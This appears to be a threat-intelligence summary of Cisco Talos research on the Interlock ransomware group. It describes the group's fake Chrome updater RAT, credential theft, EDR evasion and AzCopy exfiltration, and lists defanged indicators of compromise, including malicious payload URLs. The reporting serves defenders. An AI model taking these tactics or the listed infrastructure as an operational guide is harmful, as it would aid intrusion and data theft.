A new ransomware group came into the threat landscape dubbed as Interlock, with targeted attacks across sectors including US healthcare, IT and government, and European manufacturing with its attack chain spans around 2-3 weeks approximately.
Interlock employs both hunting and double extortion tactics, where compromised data is stolen and threatened to be released publicly unless a ransom is paid. They have a data leak site known as Worldwide Secrets Blog to publish stolen data.
Initial access often comes through a fake Google Chrome browser updater that installs a remote access tool (RAT) disguised as a legitimate update. This RAT, upon execution, collects detailed system information, establishes a secure connection to a C2 server, and transmits encrypted data.
The RAT installs a credential-stealing component, allowing Interlock to capture login details for online accounts. Interlock’s arsenal extends beyond simple data collection. The group effectively evades detection by disabling EDR and clearing event logs.
Lateral movement is achieved using RDP and other remote access tools. The encryption stage employs both Windows and Linux variants of interlock ransomware, and both versions rely on a cryptographic library called LibTomCrypt.
It would bypass crucial system folders and specific file extensions to avoid system instability, with Windows systems using Cipher Block Chaining (CBC) encryption. In contrast, Linux systems may utilize CBC or RSA encryption.
Security researchers noted the potential connection between Interlock and Rhysida ransomware groups, citing overlapping attack techniques, tools, and even code.
The interlock ransomware encryptor with the filename “conhost.exe” was earlier seen in Rhysida ransomware attacks, along with overlaps in TTPs and tools including PowerShell scripts, AnyDesk.
Both Rhysida and Interlock operators use AzCopy to exfiltrate the victim’s data to an attacker-controlled Azure storage blob, an old but uncommon technique.
Interlock and Rhysida deliver ransom notes with a similar theme.
This research was documented by researchers from Cisco Talos
Indicators of Compromise
- 23[.]95[.]182[.]59
- 195[.]201[.]21[.]34
- 159[.]223[.]46[.]184
- hxxp[:]//23[.]95[.]182[.]59/31279geuwtoisgdehbiuowaehsgdb/cht
- hxxp[:]//23[.]95[.]182[.]59/31279geuwtoisgdehbiuowaehsgdb/klg
- hxxps[:]//apple-online[.]shop/ChromeSetup[.]exe
- hxxps[:]//rvthereyet[.]com/wp-admin/images/rsggj[.]php
- a26f0a2da63a838161a7d335aaa5e4b314a232acc15dcabdb6f6dbec63cda642
- c9920e995fbc98cd3883ef4c4520300d5e82bab5d2a5c781e9e9fe694a43e82f
- e86bb8361c436be94b0901e5b39db9b6666134f23cce1e5581421c2981405cb1
